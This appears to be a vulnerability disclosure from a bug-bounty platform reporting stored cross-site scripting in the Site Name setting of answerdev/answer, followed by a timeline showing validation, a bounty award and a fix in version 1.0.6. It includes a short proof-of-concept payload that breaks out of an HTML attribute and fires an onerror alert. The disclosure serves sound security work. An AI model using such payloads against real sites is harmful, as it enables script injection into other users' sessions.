Stored XSS in Site Name in answerdev/answer


Reported on

Feb 8th 2023


Stored Cross-site Scripting (XSS) vulnerability in Site name of answerdev/answer

Proof of Concept

  1. Log in then
  2. Admin ---> Setting ---> General
  3. Enter below payload at Site Name

For More Understanding please check POC:

// PoC.js
var payload = #"><img src=/ onerror=alert(722)>


The attacker can execute arbitrary javascript in the admin account using this XSS

We are processing your report and will contact the answerdev/answer team within 24 hours. a year ago
A GitHub Issue asking the maintainers to create a exists a year ago
We have contacted a member of the answerdev/answer team and are waiting to hear back a year ago
joyqi validated this vulnerability a year ago
sanketx0722 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
joyqi marked this as fixed in 1.0.6 with commit 9870ed a year ago
The fix bounty has been dropped
This vulnerability has now been published a year ago
to join this conversation